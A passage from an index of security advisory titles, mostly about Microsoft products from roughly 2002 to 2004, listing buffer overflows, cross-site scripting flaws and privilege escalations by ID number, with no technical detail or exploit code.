Deny Service [1011632] Microsoft NT RPC Runtime Library Buffer Overflow Lets Remote Users Deny Service [1011631] Microsoft NNTP Buffer Overflow Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges [1011627] Windows 2003 Default ACL Permissions on the Firewall Service Lets Any Users Stop the Service [1011626] Microsoft Cabarc Directory Traversal Flaw Lets Remote Users Create/Overwrite Files on the Target System [1011565] Microsoft Word Parsing Flaw May Let Remote Users Execute Arbitrary Code [1011563] Microsoft Internet Explorer Lets Remote Users Access XML Documents [1011559] Microsoft .NET Forms Authentication Can Be Bypassed By Remote Users [1011434] Microsoft SQL Server Can Be Crashed By Remote Users Sending a Specially Crafted Large Buffer [1011374] Windows XP Service Pack 2 Firewall Configuration Error Exposes File and Print Sharing to Remote Users [1011344] IBM OEM Version of Windows XP Silently Creates Administrator Account With No Password [1011332] Microsoft Internet Explorer Bug in Setting Cookies in Certain Domains May Let Remote Users Conduct Session Fixation Attacks [1011253] Microsoft GDI+ Buffer Overflow in Processing JPEG Images Lets Remote Users Execute Arbitrary Code [1011252] Microsoft Works Suite Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011251] Microsoft Publisher Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011250] Microsoft FrontPage Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011249] Microsoft Office Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011200] F-Secure Anti-Virus for Microsoft Exchange Input Validation Bug in Content Scanner Server Lets Remote Users Deny Service [1011141] HP Systems Insight Manager May Not Let Users Login After Applying a Microsoft Security Patch [1011067] Microsoft Outlook Express May Disclose 'bcc:' Recipient Addresses [1011043] Microsoft Internet Explorer Local File IFRAME Error Response Lets Remote Users Determine if Files or Directories Exist [1010995] Windows XP SP2 May Display the Wrong Icon in Zip Archives [1010992] Microsoft Internet Security and Acceleration Server Does Not Block FTP Bounce Attacks [1010957] Microsoft Internet Explorer Unregistered Protocol State Error Lets Remote Users Spoof Location Bar [1010916] Microsoft Outlook Web Access Input Validation Hole in Redirection Query Permits Cross-Site Scripting Attacks [1010836] Windows Remote Desktop May Let Remote Users Crash the System [1010827] Microsoft Internet Explorer Error in 'mshtml.dll' in Processing GIF Files Lets Remote Users Crash the Browser [1010713] Microsoft Systems Management Server (SMS) Client Can Be Crashed By Remote Users [1010694] Microsoft IE Lets Remote Users Spoof Filenames Using CLSIDs [1010693] Microsoft Internet Explorer 'shell:' Protocol Lets Remote Users Execute Arbitrary Scripting Code in the Local Zone [1010692] Microsoft IIS 4.0 Buffer Overflow in Redirect Function Lets Remote Users Execute Arbitrary Code [1010690] Microsoft HTML Help Input Validation Error Lets Remote Users Execute Arbitrary Code [1010686] Microsoft Utility Manager Permits Local Applications to Run With Elevated Privileges [1010683] Microsoft Internet Explorer Same Name Javascript Bug Lets Remote Users Execute Arbitrary Javascript in the Domain of an Arbitrary Site [1010679] Microsoft Internet Explorer Access Control Flaw in popup.show() Lets Remote Users Execute Mouse-Click Actions [1010673] Microsoft Internet Explorer Can Be Crashed By Remote Users With Large Text Files [1010669] Mozilla Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010668] Firefox Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010667] Thunderbird Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010610] Microsoft IIS Web Server May Disclose Private IP Addresses in Certain Cases [1010550] Microsoft MN-500 Wireless Base Station Lets Remote Users Deny Administrative Access [1010491] Microsoft Internet Explorer Crashes When Saving Files With Special Character Strings [1010482] Microsoft Internet Explorer '%2F' URL Parsing Error Lets Remote Users Spoof Sites in the Trusted Zone [1010479] (US-CERT Issues Advisory) Microsoft Internet Explorer Cross-Domain Redirect Hole Lets Remote Users Execute Arbitrary Code [1010427] Microsoft DirectX DirectPlay Input Validation Error Lets Remote Users Crash the Application [1010189] Microsoft Outlook 2003 Scripting Restrictions Can Be Bypassed By Remote Users [1010175] Microsoft Visual Basic Buffer Overflow May Let Local Users Gain Elevated Privileges [1010166] Microsoft Outlook Express Mail Troubleshooting Function May Disclose SMTP Password to Local Users [1010165] Microsoft Internet Explorer Image Map URL Display Error Lets Remote Users Spoof URLs [1010157] Microsoft Internet Explorer showHelp Path Search Lets Remote Users Load Existing Local CHM Files [1010125] Microsoft Outlook 2003 Lets Remote Users Send E-mail to Cause the Recipient's Client to Contact a Remote Server [1010119] Microsoft Help and Support Center HCP URL Validation Error May Let Remote Users Execute Arbitrary Code If User Interactions Occur [1010092] Microsoft Internet Explorer 'file://' URL Processing Flaw Lets Remote Users Damage the Registry [1010079] Microsoft IIS ASP Script Cookie Processing Flaw May Disclose Application Information to Remote Users [1010009] Microsoft Internet Explorer SSL Icon Error May Let Remote Users Impersonate Secure Web Sites [1009939] Microsoft Internet Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009778] Microsoft H.323 Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009777] Microsoft SSL Library Input Validation Error Lets Remote Users Crash the Service [1009769] Microsoft Utility Manager Lets Local Users Run Applications With Elevated Privileges [1009768] Microsoft Winlogon Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code [1009760] Microsoft Virtual DOS Machine (VDM) Lets Local Users Gain Elevated Privileges [1009757] Microsoft Jet Database Engine 'msjet40.dll' Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009754] Microsoft ASN.1 Library (msasn1.dll) Double-Free Memory Allocation Error May Let Remote Users Execute Arbitrary Code [1009753] Microsoft SSL Library PCT Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009752] Microsoft Help and Support Center Input Validation Flaw Lets Remote Users Execute Arbitrary Code in the My Computer Zone [1009751] Microsoft LSASS Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges [1009746] Microsoft Internet Explorer Bitmap Memory Allocation Error Lets Remote Users Cause All Available Memory to Be Consumed [1009743] Microsoft Outlook Express Can Be Crashed By Remote Users With Specially Crafted EML File [1009739] Microsoft Internet Explorer Javascript OLE Object Lets Remote Users Automatically Print Without Authorization [1009690] Microsoft Internet Explorer Security Domain Flaw in Accessing CHM Files Lets Remote Users Execute Arbitrary Code [1009666] Microsoft SharePoint Portal Server Input Validation Holes Permit Cross-Site Scripting Attacks [1009604] Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data [1009603] Microsoft Outlook Express Does Not Correctly Display Links With Embedded FORM Data [1009546] Microsoft Operating Systems Have Unspecified Flaw That Yields Kernel Level Access to Local Users [1009361] Microsoft Internet Explorer Cookie Path Restrictions Can Be Bypassed By Remote Servers [1009360] Microsoft MSN Messenger May Disclose Known Files to Remote Users [1009358] Microsoft Office XP 'mailto' URL Parsing Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Domain [1009357] Microsoft Outlook 'mailto' URL Parsing Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Domain [1009243] Microsoft Internet Explorer (IE) May Leak Keystrokes Across Frames [1009128] Windows XP Kernel NtSystemDebugControl() Flaws Let Local Users With SeDebugPrivilege Execute Arbitrary Code in Kernel Mode [1009067] Microsoft Internet Explorer Integer Overflow in Processing Bitmap Files Lets Remote Users Execute Arbitrary Code [1009009] Microsoft Virtual PC for Mac Temporary File Flaw Lets Local Users Gain Root Privileges [1009007] Microsoft ASN.1 Library Heap Overflows Let Remote Users Execute Arbitrary Code With SYSTEM Privileges [1008901] Microsoft Internet Explorer Travel Log Input Validation Flaw Lets Remote Users Run Arbitrary Scripting Code in the Local Computer Domain [1008843] Windows XP Explorer Executes Arbitrary Code in Folders [1008698] Microsoft Internet Security and Acceleration Server H.323 Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008658] Windows Ftp Server Format String Flaw May Let Remote Users Execute Arbitrary Code [1008586] Microsoft Office Security Features Can Be Bypassed [1008585] GoodTech Systems Telnet Server for Windows NT/2000/XP Can Be Crashed By Remote Users [1008583] Microsoft Internet Explorer Flaw in Processing '.lnk' Shortcuts Lets Remote Users Execute Arbitrary Code [1008578] Microsoft Internet Explorer showHelp() '\..\' Directory Traversal Flaw Lets Remote Users Execute Files on the Target System [1008570] Jordan Stojanovski Windows Telnet Server 'username' Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008563] Microsoft IIS Fails to Log HTTP TRACK Requests [1008558] Microsoft Internet Explorer Trusted Domain Default Settings Facilitate Silent Installation of Executables [1008554] Microsoft IE for Mac May Disclose Sensitive Information in Secure URLs to Remote Sites via HTTP Referer Field [1008510] Openwares.org 'Microsoft IE Security Patch' URL Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008428] Microsoft ASP.NET Web Services XML Parsing Lets Remote Users Consume CPU Resources With SOAP Requests [1008425] Microsoft IE Does Not Properly Display Some URLs [1008293] Microsoft Internet Explorer Invalid ContentType May Disclose Cache Directory Location to Remote Users [1008292] Microsoft Internet Explorer MHT Redirect Flaws Let Remote Users Execute Arbitrary Code [1008245] Microsoft SharePoint May Let Remote Users Access Protected Pages Without Authenticating [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1008151] Microsoft Works Macro Name Length Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008150] Microsoft Word Macro Name Length Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008149] Microsoft Excel Macro Security Flaw Lets Remote Users Execute Arbitrary Macro Codes [1008148] Microsoft SharePoint Team Services Buffer Overflow May Let Remote Users Execute Arbitrary Code [1008147] Microsoft FrontPage Server Extensions Buffer Overflow May Let Remote Users Execute Arbitrary Code [1008053] Microsoft Internet Explorer IFRAME Refresh Lets Remote HTML Access Local Files [1008000] Microsoft Internet Explorer Lets Remote Users Execute Arbitrary Files in the Local Zone Using a Specially Crafted IFRAME/Location Header [1007937] Microsoft Exchange Server Buffer Overflow in Processing Extended Verb Requests May Let Remote Users Execute Arbitrary Code [1007936] Microsoft Outlook Web Access Input Validation Flaw in 'Compose New Message' Permits Remote Cross-Site Scripting Attacks [1007935] Microsoft ListBox and ComboBox 'user32.dll' Buffer Overflow May Allow Local Users to Gain Elevated Privileges [1007934] Microsoft Help and Support Center HCP Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code With Local Computer Privileges [1007931] Microsoft Authenticode Low Memory Flaw May Let Remote Users Execute Arbitrary Code [1007750] Microsoft BizTalk Server Default Directory Permissions May Let Remote Users Deny Service [1007689] Microsoft Internet Explorer Media Sidebar Flaw Lets Remote Users Execute Arbitrary Code on the System [1007687] Microsoft Internet Explorer Various Cross-Domain Flaws Permit Remote Scripting in Arbitrary Domains [1007618] Microsoft Visual Basic for Applications (VBA) in Multiple Microsoft Products Permits Remote Code Execution [1007617] Microsoft Converter for WordPerfect Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1007616] Microsoft Word Document Validation Error Lets Macros Run Without Warning [1007614] Microsoft Access Snapshot Viewer ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007599] Microsoft Outlook May Fail to Delete Outlook Data From the PST File [1007538] Microsoft Internet Explorer Buffer Overflow in CR549.DLL ActiveX Control Permits Remote Code Execution [1007537] Microsoft Internet Explorer Object Tag Flaw Lets Remote Users Execute Arbitrary Code [1007536] Microsoft Internet Explorer Cache Script Flaw Lets Remote Users Execute Code in the My Computer Zone [1007535] Microsoft MDAC Database Component Lets Remote Users Execute Arbitrary Code [1007507] RSA SecurID Interaction With Microsoft URLScan May Disclose URLScan Configuration to Remote Users [1007493] Microsoft Visual Studio Buffer Overflow in 'mciwndx.ocx' May Let Remote Users Execute Arbitrary Code [1007388] Microsoft WebServer Beta for Pocket PC Yields Administrative Access to Remote Users [1007306] Microsoft Outlook Express Again Executes Scripting Code in Plain Text E-mail Messages [1007287] Windows Media Player Again Lets Remote Users Install and Execute Code [1007280] Microsoft Data/Desktop Engine Named Pipe and LPC Flaws Let Local Users Execute Arbitrary Code [1007279] Microsoft SQL Server Named Pipe and LPC Flaws Let Local Users Execute Arbitrary Code [1007278] Microsoft DirectX Heap Overflow in Loading MIDI Files Lets Remote Users Execute Arbitrary Code [1007265] Microsoft MDAC ODBC Component May Store Database Passwords in Plaintext in the Registry [1007262] Microsoft IIS 6.0 Vulnerabilities Permit Cross-Site Scripting and Password Changing Attacks Against Administrators [1007238] Microsoft Outlook Web Access Can Be Crashed By Remote Authenticated Users With an Outlook 2003 Client [1007206] Microsoft SMTP Service Can Be Crashed By Remote Users Sending Mail With an Invalid FILETIME Header [1007205] Microsoft Exchange Server Can Be Crashed By Remote Users Sending Mail With an Invalid FILETIME Header [1007190] Microsoft Internet Explorer 'Chromeless' Window May Let Remote Users Spoof Various User Interface Characteristics [1007189] WebShield SMTP for Windows NT Lets Remote Users Send Executables Through the Filter [1007172] Microsoft Jet Database Engine Buffer Overflow May Let Remote Users Execute Arbitrary Code [1007154] Microsoft SMB Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1007133] Microsoft Outlook Web Access (OWA) May Disclose The User's OWA Password to Remote Users [1007126] Microsoft Internet Explorer Can By Crashed By Loading 'C:\aux' URL [1007098] Microsoft Commerce Server Discloses SQL Server Password to Local Users [1007094] Microsoft NetMeeting Directory Traversal Flaw Lets Remote Users Execute Arbitrary Code [1007072] Microsoft Internet Explorer Buffer Overflow in Processing Scripted 'HR' Tags Lets Remote Users Execute Arbitrary Code [1007070] Symantec Norton Anti-Virus Protection Fails to Detect Viruses on Floppy Diskettes Windows-XP [1007022] SurfControl for Microsoft ISA Server Discloses Files to Remote Users [1007008] Microsoft Internet Explorer XML Parsing Error Lets Remote Users Conduct Cross-Site Scripting Attacks [1007007] Microsoft Internet Explorer Custom HTTP Error Pages May Let Remote Users Execute Scripts in the Local Computer Zone [1006924] Microsoft Internet Explorer Input Validation Flaw in Displaying FTP Site Names Lets Remote Users Execute Arbitrary Scripting Code in Arbitrary Domains [1006918] Microsoft Internet Explorer (IE) Object Tag Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006901] Microsoft UrlScan Default Configuration Displays Identifying Characteristics to Remote Users [1006867] Microsoft IIS Buffer Overflow Lets Remote Users With Upload Privileges Execute Code - Remote Users Can Also Crash the Service [1006844] Microsoft Internet Connection Firewall Fails to Block IP Version 6 Protocol [1006809] Microsoft Outlook Express Lets Remote Users Silently Install Arbitrary Code Using Audio and Media Files [1006808] Microsoft Outlook Express May Be Affected by W32/Palyh@MM Mass-Mailing Worm [1006807] Microsoft Outlook May Be Affected by W32/Palyh@MM Mass-Mailing Worm [1006789] Microsoft ISA Server Input Validation Flaw Lets Remote Users Execute Scripting Code in Arbitrary Security Domains [1006774] Microsoft Internet Explorer May Execute Arbitrary Code in the Wrong Security Domain When Processing Large Numbers of Download Requests [1006771] Microsoft Outlook Express Integer Overflow Lets Remote IMAP Servers Cause the Client to Crash [1006748] Microsoft Outlook Express May Be Affected by W32.Fizzer.A@mm Mass-Mailing Worm [1006747] Microsoft Outlook May Be Affected by W32.Fizzer.A@mm Mass-Mailing Worm [1006728] Microsoft .NET Passport Passwords, Including Hotmail Passwords, Can Be Changed By Remote Users [1006718] Windows Media Player Skin File Processing Lets Remote Users Write Arbitrary Files to Arbitrary Locations [1006704] Microsoft IIS Authentication Manager Discloses Validity of User Names to Remote Users [1006696] Microsoft Internet Explorer Web Folder Access Flaw Lets Remote Users Execute Arbitrary Scripting Code in the My Computer Zone [1006691] Microsoft MN-500 Wireless Base Station Backup Configuration File Discloses Administrator Password [1006686] Microsoft BizTalk Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006634] Microsoft Internet Explorer Bugs (URLMON.DLL Buffer Overflow, File Upload Control Bypass, Plug-in URL Input Validation Flaw, CSS Modal Dialog Input Validation Flaw) Let Remote Users Execute Arbitrary Code or Access Local Files [1006608] Microsoft NTLM Authentication Protocol Flaw Lets Malicious SMB Servers Gain Access to Systems [1006607] Windows XP Service Control Manager Timing Flaw in Service Shutdown May Disclose Sensitive Information to Local Users [1006599] Microsoft REGEDIT.EXE May Let Local Users Gain Elevated Privileges [1006534] Microsoft Proxy Service in Proxy Server 2.0 Has Unspecified Flaw That Lets Remote Users Stop Traffic [1006533] Microsoft Firewall Service in ISA Server Has Unspecified Flaw That Lets Remote Users Stop Traffic [1006361] Microsoft ActiveSync Application Can Be Crashed By Remote Users [1006322] Microsoft ISA Server DNS Intrusion Detection Flaw Lets Remote Users Block DNS Inbound Requests [1006305] Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006280] Protegrity Secure.Data for Microsoft SQL Server 2000 Contains Buffer Oveflows That Let Remote Users Execute Arbitrary Code [1006257] Microsoft Internet Explorer Buffer Overflow in Processing '.MHT' Web Archives Lets Remote Users Execute Arbitrary Code [1006169] Microsoft Internet Explorer Vulnerable Codebase Object Lets Remote Users Execute Arbitrary Code [1006148] Microsoft Outlook Express Security Domain Flaw Lets Remote Users Silently Install and Execute Arbitrary Code [1006046] Microsoft Internet Explorer showHelp() Domain Security Flaw Lets Remote Users Execute Commands [1006036] Microsoft Internet Explorer May Let Remote Users Read or Write Files Via the dragDrop() Method [1005966] Microsoft Outlook May Fail to Encrypt User E-mail, Disclosing the Contents to Remote Users [1005964] Microsoft Locator Service Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Level Privileges [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1005857] Microsoft Internet Explorer Bug in Loading Multimedia Files May Let Remote Users Execute Arbitrary Scripting Code in Other Domains [1005796] Microsoft SMB Signing Flaw May Let Remote Users With Access to an SMB Session Gain Control of a Network Client [1005757] Microsoft Outlook Bug in Processing Malformed E-mail Headers Lets Remote Users Crash the Client [1005751] SMB2WWW Web-Based Windows Networking Client Bug Lets Remote Users Execute Arbitrary Programs [1005747] Microsoft Internet Explorer showModalDialog() Input Validation Flaw Lets Remote Users Execute Arbitary Scripting Code in Any Security Zone [1005723] OpenWindows mailtool(1) Client for Sun Solaris Can Be Crashed By Remote Users [1005699] Microsoft Internet Explorer (IE) Java Class Loader Security Flaw Lets Remote Users Bypass Java Security Restrictions [1005698] Microsoft Java Virtual Machine (VM) Class Loader Security Flaw Lets Remote Users Bypass Java Security Restrictions [1005674] Microsoft Internet Explorer Buffer Overflow in Processing PNG Images Allows Denial of Service Attacks [1005672] Microsoft Internet Explorer MDAC Component Buffer Overflow Allows Remote Users to Execute Arbitrary Code [1005671] Microsoft Data Access Components (MDAC) Buffer Overflow Allows Remote Users to Execute Arbitrary Code [1005505] Microsoft Internet Information Server (IIS) Script Access Control Bug May Let Remote Authenticated Users Upload Unauthorized Executable Files [1005504] Microsoft Internet Information Server (IIS) WebDAV Memory Allocation Flaw Lets Remote Users Crash the Server [1005503] Microsoft Internet Information Server (IIS) Administrative Pages Allow Cross-Site Scripting Attacks [1005502] Microsoft Internet Information Server (IIS) Out-of-Process Access Control Bug Lets Certain Authenticated Users Gain Full Control of the Server [1005489] Microsoft Outlook Express May Fail to Delete E-mail Messages from Local Storage [1005466] Microsoft Internet Explorer Cached Object Flaw Lets Remote Users Execute Arbitrary Programs on the Target User's Computer [1005436] Microsoft Data Engine/Desktop Engine (MSDE) Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005435] Microsoft SQL Server Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005416] Microsoft Internet Explorer Flaw in WebBrowser Control Document Property Lets Remote Users Run Code in the My Computer Security Zone [1005405] Microsoft Outlook Express Buffer Overflow in Parsing S/MIME Messages Lets Remote Users Execute Arbitrary Code [1005395] Microsoft Content Management Server Input Validation Bug in 'ManualLogin.asp' Allows Cross-Site Scripting Attacks [1005377] Microsoft MSN Hotmail/Passport Login Page May Permit Cookie Stealing Via Cross-Site Scripting Attacks [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT [1005339] Microsoft Services for Unix Interix SDK Bugs May Allow Denial of Service Conditions or May Execute Arbitrary Code [1005338] Microsoft Data/Desktop Engine (MSDE) Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005337] Microsoft SQL Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005296] Microsoft PPTP Service Buffer Overflow May Let Remote Users Execute Arbitrary Code [1005287] Microsoft FrontPage Server Extensions SmartHTML Interpreter Bugs May Let Remote Users Execute Arbitrary Code with System Privileges [1005254] Microsoft NT, 2000, and XP Operating Systems May Execute a 16-bit Application Even When The File Has No Execute Permissions [1005246] Microsoft Remote Desktop Protocol (RDP) Design Flaw May Disclose Information About the Unencrypted Data to Remote Users and May Let Data Be Modified During Transmission [1005243] Microsoft NetMeeting Remote Desktop Sharing Screen Saver Access Control Flaw Lets Physically Local Users Hijack Remote Sessions [1005223] (Microsoft Responds) Microsoft Word Document Processing File Include Bug May Let Remote Users Obtain Files From a Target User's System [1005210] Apple QuickTime Media Player Buffer Overflow Lets Remote Users Execute Arbitrary Code on Windows Systems [1005207] Microsoft Outlook Express Can Be Crashed By Remote Users Sending HTML Mail With Long Links Embedded [1005203] Microsoft Internet Explorer Frame Domain Security Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Zone Via Frame URLs [1005200] Microsoft Internet Explorer Implementation Bugs in Java Native Methods May Let Remote Users Execute Arbitrary Code Via Malicious Applets [1005182] Microsoft Internet Explorer URL Decoding Inconsistency May Result in a Web Page Loading in the Incorrect Security Domain [1005177] Microsoft Visual FoxPro Filename Processing Bug Lets Remote Users Create HTML That Will Cause Arbitrary Code to Be Executed When the HTML is Loaded [1005128] Microsoft Internet Explorer XML Script Element Redirect Bug Lets Remote Users View XML Files on the Target User's Computer [1005127] Microsoft Visual Studio .NET Web Projects May Disclose the Web Directory Structure to Remote Users [1005123] Microsoft Internet Explorer Buffer Overflow in Unspecified Text Formatting ActiveX Control Lets Remote Users Execute Arbitrary Code [1005120] Microsoft Terminal Services Advanced Client (TSAC) ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005119] Microsoft Operating System SMB Protocol Implementation in the Network [1005112] Microsoft File Transfer Manager ActiveX Control Buffer Overflow May Let Remote Users Execute Arbitrary Code [1005083] Microsoft Internet Information Server (IIS) Web Server Fails to Properly Validate Client-side Certificates, Allowing Remote Users to Impersonate Other Users or Certificate Issuers [1005075] Microsoft Internet Explorer XMLDSO Java Class Lets Remote HTML Code Access Local Files [1005071] Microsoft DirectX Files Viewer ActiveX Control Has Buffer Overflow That Allows Remote Users to Execute Arbitrary Code [1005067] Microsoft Desktop Engine (MSDE) Extended Stored Procedures May Let Local Users Execute Commands With Database Administrator Privileges [1005066] Microsoft SQL Server Extended Stored Procedures May Let Local Users Execute Commands With Database Administrator Privileges [1005065] Microsoft Network Connection Manager Could Give a Local User System Level Privileges [1004997] Citrix MetaFrame Running on Windows NT4 Terminal Server Can Be Crashed By a Remote User via the Java ICA Web Terminal Interface [1004986] Microsoft Content Management Server Buffer Overflow in Authentication Function May Allow Remote Users to Execute Arbitrary Code With System Level Privileges [1004983] Microsoft Visual C++ Flaw in calloc() and Similar Functions May Result in Buffer Overflows in Applications That Use the Compiler or Runtime Library [1004965] Microsoft Internet Explorer SSL Implementation Flaw in Following Certificate Chains Allows Remote Users to Conduct Man-in-the-Middle Attacks to Obtain Unencrypted Data from the Browser [1004937] Windows 2000 Operating System Default Permissions for the System Partition Lets Local Users Bypass Individual File Permissions and Replace Key System Files [1004927] Microsoft Terminal Services Can Be Crashed By Remote Users Conducting a TCP SYN Scan in Certain Situations [1004917] Microsoft SQL Server MDAC Function Buffer Overflow May Let Remote Users Execute Arbitrary Code to Gain Full Control Over the Database [1004877] Microsoft Internet Explorer (IE) Web Browser JavaScript 'Same Origin Policy' Flaw Allows Remote Users to Create Malicious JavaScript to Retrieve Web Data from a Victim's Internal Network [1004862] Microsoft Outlook Express Flaw in Parsing XML Using Internet Explorer Allows a Remote User to Silently Deliver and Install an Executable on a Target User's Computer [1004831] Microsoft Data Engine (MSDE) Buffer Overflow in Database Consistency Checker May Let Remote Authenticated Users Execute Arbitrary Code with the Privileges of the Database Service [1004830] Microsoft SQL Server Buffer Overflow in Database Consistency Checker May Let Remote Authenticated Users Execute Arbitrary Code with the Privileges of the Database Service [1004829] Microsoft SQL Server Resolution Service Buffer Overflows Let Remote Users Execute Arbitrary Code with the Privileges of the SQL Service [1004828] Microsoft Exchange Server Buffer Overflow in Processing SMTP EHLO Command Lets Remote Users Execute Arbitrary Code on the Server with System Level Privileges [1004827] Microsoft Metadirectory Services Authentication Flaw May Let Remote Users Modify Data and Obtain Elevated Privileges on the System [1004805] Microsoft Outlook Express (and Possibly Outlook) Has File Attachment Name Bugs That Let Remote Users Send Malicious Mail to Bypass Attachment Type Filters and Modify the Apparent File Name and File Size [1004761] Microsoft Foundation Classes (MFC) Information Server Application Programming Interface (ISAPI) 'mfc42.dll' Contains Buffer Overflows That Can Crash the System or Possibly Allow for the Remote Execution of Arbitrary Code [1004757] Microsoft IIS SMTP Service Encapsulation Bug Lets Remote Users Relay Mail and Send SPAM Via the Service [1004746] Microsoft Internet Explorer Flaw in OBJECT Domain Security Enforcement Lets Remote Users Execute Code in Arbitrary Domains [1004744] Microsoft SQL Server Install Process May Disclose Sensitive Passwords to Local Users [1004739] Microsoft SQL Server Desktop Engine (MSDE) Buffer Overflow and Access Control Bug May Let Remote Authorized Users Execute Code with Elevated Privileges, Possibly Including Local System Privileges [1004738] Microsoft SQL Server Buffer Overflow and Access Control Bug May Let Remote Authorized Users Execute Code with Elevated Privileges, Possibly Including Local System Privileges [1004713] Worldspan for Windows Gateway Software Can Be Crashed By Remote Users Sending Malformed Packets [1004686] APC PowerChute Plus for Windows Default Configuration Creates a Shared Folder with World Writeable Permissions [1004646] ColdFusion MX Buffer Overflow When Used With Microsoft Internet Information Server (IIS) Lets Remote Users Crash the IIS Web Server or Execute Arbitrary Code [1004638] Windows Media Player May Let Remote Users Execute Code on a Target User's Computer or Let Local Users Gain Elevated Privileges [1004637] Microsoft Commerce Server Buffer Overflows and Other Flaws Let Remote Users Execute Arbitrary Code with LocalSystem Privileges [1004618] Microsoft Internet Explorer Can Be Crashed By Malicious AVI Object in HTML [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads [1004595] Microsoft Word Documents May Execute Remotely Supplied Macro Code Under Certain Conditions [1004594] Microsoft Excel Spreadsheet May Execute Remotely Supplied Macro Code Within Malicious Documents [1004587] Microsoft SQL Server 2000 Buffer Overflow in OpenDataSource() Function May Let Remote Users Gain SYSTEM Privileges on the Server [1004569] Microsoft Visual Studio .NET Korean Language Version Contains Nimda Virus [1004544] Microsoft SQL Server Buffer Overflow in 'pwdencrypt()' Function May Let Remote Authorized Users Execute Arbitrary Code [1004542] Lumigent Log Explorer Buffer Overflow May Let Remote Users Crash the Microsoft SQL Server Service or Execute Arbitrary Code on the System [1004541] Compaq Insight Manager May Include a Vulnerable Default Configuration of Microsoft MSDE/SQL Server That Allows Remote Users to Execute Commands on the System [1004529] Microsoft Remote Access Service (RAS) Phonebook Buffer Overflow May Let Local Users Execute Arbitrary Code with Local System Privileges [1004528] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains an Input Validation Flaw in an XML SQL Tag That Allows Cross-Site Scripting Attacks [1004527] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains a Buffer Overflow That Lets Remote Users Take Full Control of the System [1004526] Microsoft Internet Information Server (IIS) Heap Overflow in HTR ISAPI Extension While Processing Chunked Encoded Data Lets Remote Users Execute Arbitrary Code [1004518] Microsoft Proxy Server Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Server to Gain Full Control of the Server [1004517] Microsoft Internet Security and Acceleration Server (ISA) Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Server to Gain Full Control of the Server [1004486] Microsoft ASP.NET Buffer Overflow in Processing Cookies in StateServer Mode May Let Remote Users Crash the Service or Execute Arbitrary Code on the Server [1004479] Microsoft Internet Explorer May Execute Remotely Supplied Scripting in the My Computer Zone if FTP Folder Viewing is Enabled [1004464] Microsoft Internet Explorer Buffer Overflow in Processing Gopher Protocol Responses Allows Remote Users to Execute Code on the Victim's Computer [1004436] Microsoft Internet Explorer Allows HTML-Delivered Compiled Help Files to Be Automatically Executed on the Target User's Computer [1004407] Microsoft Exchange 2000 Flaw in Processing a Certain Malformed SMTP Command Allows Remote Users to Deny Service to the Server [1004372] Microsoft Excel Spreadsheet XML Stylesheet ActiveX Object Flaw Lets Remote Users Create Malicious Excel Spreadsheets That May Execute Arbitrary Code When Opened With the XML Stylesheet Option [1004369] Microsoft Active Directory May Have Bug That Allows Remote Users to Crash the Directory [1004361] Microsoft Date Engine (MSDE) Default Configuration Leaves Blank Password for System Administrator Account [1004360] Opty-Way Enterprise Glassworks Management Application Installs Microsoft Data Engine Insecurely, Allowing Remote Users to Execute Commands on the System [1004350] Deerfield WebSite Pro Windows-based Web Server May Disclose CGI Source Code to Remote Users in Certain Cases [1004304] Microsoft Internet Explorer (IE) New Content-Disposition Bugs May Let Remote Users Execute Arbitrary Code on the Victim's Computer [1004300] Microsoft Internet Explorer (IE) Zone Spoofing Hole Lets Remote Users Create HTML That, When Loaded, May Run in a Less-Secure IE Security Zone [1004290] Microsoft Internet Explorer Bugs in 'BGSOUND' and 'IFRAME' Tags Let Remote Users Create HTML That Will Cause Denial of Service Conditions or Will Access Special DOS Devices [1004259] Network Associates PGP 'Wipe Deleted Files' Option Fails to Wipe Clear Text Temporary Files Used by the Windows 2000 Encrypted File System Feature [1004251] Microsoft Exchange Instant Messenger 